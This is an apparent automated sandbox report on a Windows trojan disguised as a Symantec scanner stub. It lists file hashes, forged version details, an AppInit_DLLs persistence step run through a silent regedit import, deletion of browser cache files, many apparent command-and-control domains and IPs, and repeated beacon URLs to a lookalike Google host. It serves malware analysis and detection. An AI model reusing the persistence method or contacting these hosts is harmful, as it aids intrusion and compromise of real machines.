Analysis Date: 2014-10-26 01:03:22
MD5: e9209255cce176205be8470974b7aec2
SHA1: 4344c3f23eb4b80da90b1642b2f01b9c36e82f55

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section: .text md5: c76832309cfc18a514689f343c29931c sha1: f3f8f92bd021009996356074df2632386861a83f size: 27648
Section: .rdata md5: 60afc5d2f950acbec0dcd0c6efeba4e9 sha1: 222b954e7d8a833483bf0637e17e2c60d2cbaa42 size: 7680
Section: .data md5: d31155f63c8c4ed2c30ca9511b83fe58 sha1: 2180da69c1448c39f5704a8bd03698826f843d83 size: 5120
Section: .rsrc md5: 0c5b9fbe5329a0d5ac51ed6692012139 sha1: 6c47ca3871e65dd04610b59edad73775a5220a36 size: 299008
Timestamp: 2012-10-20 10:19:20
Version:
LegalCopyright: Copyright © 2012 Symantec Corporation. All rights reserved.
InternalName: Navwnt
FileVersion: 19.8.0.14
CompanyName: Symantec Corporation
Product Date: 07/26/2012
ProductName: Symantec Shared Component
ProductVersion: 19.8
FileDescription: Symantec Shared Component Scanner Stub
OriginalFilename: Navwnt.exe
Packer: Microsoft Visual C++ ?.?
PEhash: 5d2618f413e1bc373eac0dbd465f0255a9181601
IMPhash: 2f39e4291325430fedd220b7e4610838

Runtime Details:

Process
↳ C:\malware.exe

Creates File: C:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Creates File: C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\desktop.ini
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\desktop.ini
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\desktop.ini
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\desktop.ini
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\desktop.ini
Deletes File: C:\Documents and Settings\Administrator\Cookies\index.dat

Process
↳ C:\WINDOWS\Explorer.EXE

Registry: HKEY_CURRENT_USER\SessionInformation\ProgramCount ➝ NULL
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Cookies\cf
Creates File: C:\WINDOWS\system32\fnztsch.dll
Deletes File: C:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Deletes File: C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Creates Process: C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Winsock DNS: detoxist.com
Winsock DNS: clickbeta.ru
Winsock DNS: 91.220.35.154
Winsock DNS: veroconma.com
Winsock DNS: terrans.su
Winsock DNS: getinball.com
Winsock DNS: theloamva.com
Winsock DNS: tryatdns.com
Winsock DNS: clickclans.ru
Winsock DNS: dentagod.com
Winsock DNS: denareclick.com
Winsock DNS: debijonda.com
Winsock DNS: fescheck.com
Winsock DNS: liteworns.com
Winsock DNS: getintsu.com
Winsock DNS: nshouse1.com
Winsock DNS: vengibit.com
Winsock DNS: tryangets.com
Winsock DNS: netrovad.com
Winsock DNS: vornedix.com
Winsock DNS: inzavora.com
Winsock DNS: getavodes.com
Winsock DNS: clickstano.com

Process
↳ C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg

Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs ➝ C:\WINDOWS\system32\fnztsch.dll\\x00

Network Details:

DNS: detoxist.com, Type: A, 141.8.225.80
DNS: debijonda.com, Type: A, 141.8.225.80
DNS: veroconma.com, Type: A, 74.117.179.241
DNS: theloamva.com, Type: A, 141.8.225.80
DNS: vornedix.com, Type: A, 141.8.225.80
DNS: dentagod.com, Type: A, 141.8.225.80
DNS: liteworns.com, Type: A, 141.8.225.80
DNS: vengibit.com, Type: A, 141.8.225.80
DNS: tryangets.com, Type: A, 141.8.225.80
DNS: getintsu.com, Type: A, 141.8.225.80
DNS: getavodes.com, Type: A, 141.8.225.80
DNS: tryatdns.com, Type: A, 141.8.225.80
DNS: fescheck.com, Type: A, 141.8.225.80
DNS: inzavora.com, Type: A, 141.8.225.80
DNS: getinball.com, Type: A
DNS: netrovad.com, Type: A
DNS: terrans.su, Type: A
DNS: clickstano.com, Type: A
DNS: denareclick.com, Type: A
DNS: clickbeta.ru, Type: A
DNS: nshouse1.com, Type: A
DNS: clickclans.ru, Type: A
HTTP GET: http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=160&av=0&vm=0&al=0&p=684&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg2sxot3va5UFMR4Fz7sCGn/SZH/J4vy1QePt8vo0n/rd
User-Agent:
HTTP GET: http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=160&av=0&vm=0&al=0&p=684&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg2sxot3va5UFMR4Fz7sCGn/SZH/J4vy1QaELeQaX51YV
User-Agent:
HTTP GET: http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=160&av=0&vm=0&al=0&p=684&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg2sxot3va5UFMR4Fz7sCGn/SZH/J4vy1QTFVH603cTE6
User-Agent:
HTTP GET: http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=160&av=0&vm=0&al=0&p=684&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg2sxot3va5UFMR4Fz7sCGn/SZH/J4vy1QTFVH603cTE6
User-Agent:
HTTP GET: http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=160&av=0&vm=0&al=0&p=684&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg2sxot3va5UFMR4Fz7sCGn/SZH/J4vy1Qd05PA4KE3ns
User-Agent:
HTTP GET: http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=160&av=0&vm=0&al=0&p=684&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg2sxot3va5UFMR4Fz7sCGn/SZH/J4vy1Qd05PA4KE3ns
User-Agent:
HTTP GET: http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=160&av=0&vm=0&al=0&p=684&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg2sxot3va5UFMR4Fz7sCGn/SZH/J4vy1QTG0ZZMyDjR6
User-Agent:
HTTP GET: http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=160&av=0&vm=0&al=0&p=684&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg2sxot3va5UFMR4Fz7sCGn/SZH/J4vy1QQ9j/shihnj9
User-Agent:
HTTP GET: http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=160&av=0&vm=0&al=0&p=684&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg2sxot3va5UFMR4Fz7sCGn/SZH/J4vy1QQ9j/shihnj9
User-Agent:
HTTP GET: http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=160&av=0&vm=0&al=0&p=684&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg2sxot3va5UFMR4Fz7sCGn/SZH/J4vy1QQ9j/shihnj9
User-Agent:
HTTP GET: http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=160&av=0&vm=0&al=0&p=684&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg2sxot3va5UFMR4Fz7sCGn/SZH/J4vy1QYbXvRVvNgFW
User-Agent:
HTTP GET: http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=160&av=0&vm=0&al=0&p=684&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg2sxot3va5UFMR4Fz7sCGn/SZH/J4vy1QTH19ufphf5f
User-Agent:
HTTP GET: http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=160&av=0&vm=0&al=0&p=684&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg2sxot3va5UFMR4Fz7sCGn/SZH/J4vy1QXuley1FKA99
User-Agent:
HTTP GET: http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=160&av=0&vm=0&al=0&p=684&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg2sxot3va5UFMR4Fz7sCGn/SZH/J4vy1QQ9j/shihnj9
User-Agent:
HTTP GET: http://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=160&av=0&vm=0&al=0&p=684&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg2sxot3va5UFMR4Fz7sCGn/SZH/J4vy1QTAb9SydVzVR
User-Agent:
Flows TCP: 192.168.1.1:1031 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1032 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1033 ➝ 74.117.179.241:80
Flows TCP: 192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1035 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1036 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1037 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1038 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1039 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1040 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1041 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1042 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1043 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1044 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1045 ➝ 91.220.35.154:80

Raw Pcap

Strings